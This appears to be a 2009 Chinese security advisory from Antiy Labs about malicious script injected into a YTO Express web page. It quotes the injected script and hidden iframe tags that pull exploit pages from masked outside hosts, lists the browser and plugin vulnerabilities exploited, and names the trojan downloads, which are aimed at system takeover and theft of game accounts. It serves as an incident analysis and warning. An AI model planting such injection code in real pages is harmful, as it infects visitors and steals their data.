圆通速递网站挂马事件
2月2日,安天实验室发现,圆通速递网站2009年春节假期安排页面(http://www.yto.net.cn/News/list.asp?id=842)被黑客植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。安天实验室提醒广大网民:在春节假期以及节后上班期间,挂马者专门选择一些高访问量的页面以及大家关心的春节旅游、车票网站等页面进行挂马。我们可以看到圆通速递被挂马的这个页面至今已经有超过7万次的访问量,对广大网民造成了很大的危害。该网站问题代码:
http://www.antiy.com/cn/security/img/20090203a.jpg
<script src=http://3****.c%6Fm/c.js></script>
<script src=http://s581.3***.org/c.js></script>
这两个链接最终都是链接到http://www.2009****.cn/llsg/2.htm这个挂马链接。
http://s581.3***.org/c.js 问题框架代码:
http://www.antiy.com/cn/security/img/20090203b.jpg
document.writeln("document.write(\'<iframe src=http:\/\/www.2009****.cn\/llsg\/2.htm width=0 height=0>
http://www.2009****.cn/llsg/2.htm问题框架代码:
http://www.antiy.com/cn/security/img/20090203c.jpg
<iframe src=http://www.712****.cn/a114/fxx.htm width=100 height=0></Iframe>
http://www.712****.cn/a114/fxx.htm网马代码:
http://www.antiy.com/cn/security/img/20090203d.jpg
该加密网马解密后可知利用以下漏洞来传播:
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
暴风影音播放器MPS.StormPlayer漏洞
RealPlayer播放器IERPCtl.IERPCtl.1漏洞
联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
Real Networks RealPlayer包含的'rmoc3260.dll' ActiveX控件存在内存破坏漏洞
Adobe Flash Player SWF文件漏洞
微软IE7漏洞 当用户访问http://www.yto.net.cn/News/list.asp?id=842时,系统会自动下载以下病毒文件:
http://d.a****.com/new/a1.css 病毒名:(Trojan/Win32.Murlo.aab)
http://d.a****.com/new/a114.css 病毒名:(Trojan/Win32.Murlo.aab)
http://www.w****.com/new/new1.exe 病毒名:(Trojan/Win32.WOW.ewz)
http://www.w****.com/new/new2.exe 病毒名:(Worm/Win32.Downloader.zx)
http://www.w****.com/new/new3.exe 病毒名:(Worm/Win32.Downloader.zx)
http://www.w****.com/new/new4.exe 病毒名:(Worm/Win32.Downloader.zx)
http://www.w****.com/new/new5.exe 病毒名:(Trojan/Win32.Agent.sc)
http://www.w****.com/new/new6.exe 病毒名:(Worm/Win32.Downloader.zx)
http://www.w****.com/new/new7.exe 病毒名:(Worm/Win32.Downloader.zx)
http://www.w****.com/new/new8.exe 病毒名:(Worm/Win32.Downloader.zx)
http://www.w****.com/new/new9.exe 病毒名:(Worm/Win32.Downloader.yv)
http://www.w****.com/new/new10.exe 病毒名:(Worm/Win32.Downloader.zx)
http://www.w****.com/new/new11.exe 病毒名:(Trojan/Win32.Agent.bnqy)
http://www.w****.com/new/new12.exe 病毒名:(Worm/Win32.Downloader.zx)
http://www.w****.com/new/new13.exe 病毒名:(Worm/Win32.Downloader.zd)
http://www.w****.com/new/new14.exe 病毒名:(Trojan/Win32.Agent.blre)
http://www.w****.com/new/new15.exe 病毒名:(Trojan/Win32.OnLineGames.ulgq)
http://www1.w****.com/new/new16.exe 病毒名:(Worm/Win32.Downloader.zd)
http://www1.w****.com/new/new17.exe 病毒名:(Trojan/Win32.Agent.bknn)
http://www1.w****.com/new/new18.exe 病毒名:(Trojan/Win32.Agent.bkpt)
http://www1.w****.com/new/new19.exe 病毒名:(Worm/Win32.Downloader.zx)
http://www1.w****.com/new/new20.exe 病毒名:(Trojan/Win32.Pakes.mqh)
http://www1.w****.com/new/new21.exe 病毒名:(Worm/Win32.Downloader.zx)
http://www1.w****.com/new/new22.exe 病毒名:(Trojan/Win32.Agent.blmy)
http://www1.w****.com/new/new23.exe 病毒名:(Trojan/Win32.Agent.adxr)
http://www1.w****.com/new/new24.exe 病毒名:(Trojan/Win32.Agent.afqg)
http://www1.w****.com/new/new25.exe 病毒名:(Trojan/Win32.Small.cah)
http://www1.w****.com/new/new26.exe 病毒名:(Worm/Win32.Downloader.zd)
http://www1.w****.com/new/new27.exe 病毒名:(Trojan/Win32.Lmir.ckv)
http://www1.w****.com/new/new28.exe 病毒名:(Trojan/Win32.Agent.ahzz)
以上病毒文件为下载者木马和游戏盗号木马,自动运行后将会盗取用户敏感信息,甚至导致死机。由于下载数量太多,这里不一一分析。
页:
[1]